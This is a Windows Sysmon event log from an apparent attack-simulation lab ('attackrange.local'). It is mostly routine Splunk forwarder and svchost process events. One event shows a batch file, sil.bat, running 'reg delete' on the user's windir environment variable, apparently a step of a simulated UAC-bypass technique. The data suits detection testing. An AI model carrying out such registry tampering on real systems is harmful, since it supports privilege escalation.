07:57:22.162{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg delete "HKCU\Environment" /v "windir" /FC:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x80000000000000001051046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:23.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14FF1EBF5E72B6FD50DC74DDBAEF7D3,SHA256=FDE38FA3E9B56657DD88A6858119DD83D328F2AE129149AC2EACA00ED1260515,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:23.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A3C69BBEA427625B8090475841DE68,SHA256=232B60C4C9EC83CFF66929E6D8928906437A46F542CE308A888B32B087ED8B88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:23.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C1A7879348310697402784045F3CD40,SHA256=D74E9AC8D39727063608EC59DC26094F9E2998D13D5920F8AC0AB6C891D3A9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:24.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EAF95ADFFDCBFE17EAF0E7B359AC21E,SHA256=A8C468075EAB3A8B1D4E73A068CACB82AFD050730EFE5DC1EB532E443CB9611D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.307{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.197{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942256A61058D2F67763136402B32027,SHA256=A834EF5BA67529F124C82F0E2FA84116EE9CD5B842830B834D135B9B44065D52,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.624{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51098-false10.0.1.12-8000- 23542300x80000000000000001051049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:25.860{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EEE23A7FFC88AF33B42F263FB4D6D5,SHA256=C60BB33E17A5285DE680B51FF3F9CD56D9CEB247C852DC2F1346F6D173F71831,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.791{0C1E0330-F5E5-60EB-9879-00000000D001}27963076C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
